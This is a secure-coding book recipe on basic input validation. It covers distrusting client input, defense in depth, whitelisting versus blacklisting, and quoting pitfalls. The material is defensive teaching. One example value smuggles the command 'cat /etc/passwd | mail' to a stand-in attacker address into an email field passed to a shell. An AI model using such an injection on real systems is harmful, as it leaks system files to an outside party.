3.1 Understanding Basic Data Validation Techniques
3.1.1 Problem
You have data coming into your
application, and you would like to filter or reject data that might
be malicious.
3.1.2 Solution
Perform data validation at all levels
whenever possible. At the very least, make sure data is filtered on
input.
Match constructs that are known to be valid and harmless. Reject
anything else.
In addition, be sure to be skeptical about any data coming from a
potentially insecure channel. In a client-server architecture, for
example, even if you wrote the client, the server should never assume
it is talking to a trusted client.
3.1.3 Discussion
Applications should not trust any external input. We have often seen
situations in which people had a custom client-server application and
the application developer assumed that, because the client was
written in house by trusted, strong coders, there was nothing to
worry about in terms of malicious data being injected.
Those kinds of assumptions lead people to do things that turn out
badly, such as embedding in a client SQL queries or shell commands
that get sent to a server and executed. In such a scenario, an
attacker who is good at reverse engineering can replace the SQL code
in the client-side binary with malicious SQL code (perhaps code that
reads private records or deletes important data). The attacker could
also replace the actual client with a handcrafted client.
In many situations, an attacker who does not even have control over
the client is nevertheless able to inject malicious data. For
example, he might inject bogus data into the network stream.
Cryptography can sometimes help, but even then, we have seen
situations in which the attacker did not need to send data that
decrypted properly to cause a problem—for example, as a buffer
overflow in the portion of an application that does the decryption.
You can regard input validation as a kind of access
control mechanism. For example, you will generally want to validate
that the person on the other end of the connection has the right
credentials to perform the operations that she is requesting.
However, when you're doing data validation, most
often you'll be worried about input that might do
things that no user is supposed to be able to do.
For example, an access control mechanism might determine whether a
user has the right to use your application to send email. If the user
has that privilege, and your software calls out to the shell to send
email (which is generally a bad idea), the user should not be able to
manipulate the data in such a way that he can do anything other than
send mail as intended.
Let's look at basic rules for proper
data
validation:
- Assume all input is guilty until proven otherwise.
-
As we said earlier, you should never trust external input that comes
from outside the trusted base. In addition, you should be very
skeptical about which components of the system are trusted, even
after you have authenticated the user on the other end!
- Prefer rejecting data to filtering data.
-
If you determine that a piece of data might possibly be malicious,
your best bet from a security perspective is to assume that using the
data will screw you up royally no matter what you do, and act
accordingly. In some environments, you might need to be able to
handle arbitrary data, in which case you will need to treat all input
in a way that ensures everything is benign. Avoid the latter
situation if possible, because it is a lot harder to get right.
- Perform data validation both at input points and at the component level.
-
One of the most important principles in computer security,
defense in depth, states that you should provide multiple
defenses against a problem if a single defense may fail. This is
important in input validation. You can check the validity of data as
it comes in from the network, and you can check it right before you
use the data in a manner that might possibly have security
implications. However, each one of these techniques alone is somewhat
error-prone.
When you're checking input at the points where data
arrives, be aware that components might get ripped out and matched
with code that does not do the proper checking, making the components
less robust than they should be. More importantly, it is often very
difficult to understand enough about the context of the data well
enough to make validation easy when data is fresh from the network.
That is, routines that read from a socket usually do not understand
anything about the state the application is in. Without such
knowledge, input routines can do only rudimentary filtering.
On the other hand, when you're checking input at the
point before you use it, it's often easy to forget
to perform the check. Most of the time, you will want to make life
easier by producing your own wrapper API to do the filtering, but
sometimes you might forget to call it or end up calling it
improperly. For example, many people try to use strncpy(
) to
help prevent buffer overflows, but it is easy to use this function in
the wrong way, as we discuss in Recipe 3.3.
- Do not accept commands from the user unless you parse them yourself.
-
Many data input problems involve the program's
passing off data that came from an untrusted source to some other
entity that actually parses and acts on the data. If the component
doing the parsing has to trust its caller, bad things can happen if
your software does not do the proper checking. The best known example
of this is the Unix command shell. Sometimes, programs will
accomplish tasks by using functions such as system(
) or popen( ) that invoke a shell (which
is often a bad idea by itself; see Recipe 1.7).
(We'll look at the shell input problem later in this
chapter.) Another popular example is the database query using the SQL
language. (We'll discuss input validation problems
with SQL in Recipe 3.11.)
- Beware of special commands, characters, and quoting.
-
One obvious thing to do when using a command language such as the
Unix shell or SQL is to construct commands in trusted software,
instead of allowing users to send commands that get proxied. However,
there is another "gotcha" here.
Suppose that you provide users the ability to search a database for a
word. When the user gives you that word, you may be inclined to
concatenate it to your SQL command. If you do not validate the input,
the user might be able to run other commands.
Consider what happens if you have a server application that, among
other things, can send email. Suppose that the email address comes
from an untrusted client. If the email address is placed into a
buffer using a format string like "/bin/mail %s <
/tmp/email", what happens if the user submits the
following email address: "dummy@address.com; cat
/etc/passwd | mail some@attacker.org"?
- Make policy decisions based on a "default deny" rule.
-
There are two different approaches to data filtering. With the first,
known as
whitelisting,
you accept input as valid only if it meets specific criteria.
Otherwise, you reject it. If you do this, the major thing you need to
worry about is whether the rules that define your whitelist are
actually correct!
With the other approach, known as
blacklisting,
you reject only those things that are known to be bad. It is much
easier to get your policy wrong when you take this approach.
For example, if you really want to invoke a mail program by calling a
shell, you might take a whitelist approach in which you allow only
well-formed email addresses, as discussed in Recipe 3.9. Or you might
use a slightly more liberal (less exact) whitelist policy in which
you only allow letters, digits, the @ sign, and periods.
With a blacklist approach, you might try to block out every character
that might be leveraged in an attack. It is hard to be sure that you
are not missing something here, particularly if you try to consider
every single operational environment in which your software may be
deployed. For example, if calling out to a shell, you may find all
the special characters for the bash shell and check for those, but
leave people using tcsh (or something unusual)
open to attack.
- You can look for a quoting mechanism, but know how to use it properly.
-
Sometimes, you really do need to be
able to accept arbitrary data from an untrusted source and use that
data in a security-critical way. For example, you might want to be
able to put arbitrary contents from arbitrary documents into a
database. In such a case, you might look for some kind of quoting
mechanism. For example, you can usually stick untrusted data in
single quotes in such an environment.
However, you need to be aware of ways in which an attacker can leave
the quoted environment, and you must actively make sure that the
attacker does not try to use them. For example, what happens if the
attacker puts a single quote in the data? Will that end the quoting,
allowing the rest of the attacker's data to do
malicious things? If there are such escapes, you should check for
them. In this particular example, you might be able to replace quotes
in the attacker's data with a backslash followed by
a quote.
- When designing your own quoting mechanisms, do not allow escapes.
-
Following from the previous point, if you need to filter data instead
of rejecting potentially harmful data, it is useful to provide
functions that properly quote an arbitrary piece of data for you. For
example, you might have a function that quotes a string for a
database, ensuring that the input will always be interpreted as a
single string and nothing more. Such a function would put quotes
around the string and additionally escape anything that could thwart
the surrounding quotes (such as a nested quote).
- The better you understand the data, the better you can filter it.
-
Rough heuristics like "accept the following
characters" do not always work well for data
validation. Even if you filter out all bad characters, are the
resulting combinations of benign characters a problem? For example,
if you pass untrusted data through a shell, do you want to take the
risk that an attacker might be able to ignore metacharacters but
still do some damage by throwing in a well-placed shell keyword?
The best way to ensure that data is not bad is to do your very best
to understand the data and the context in which that data will be
used. Therefore, even if you're passing data on to
some other component, if you need to trust the data before you send
it, you should parse it as accurately as possible. Moreover, in
situations where you cannot be accurate, at least be conservative,
and assume that the data is malicious.
3.1.4 See Also
Recipe 1.7, Recipe 3.3, Recipe 3.9, Recipe 3.11
|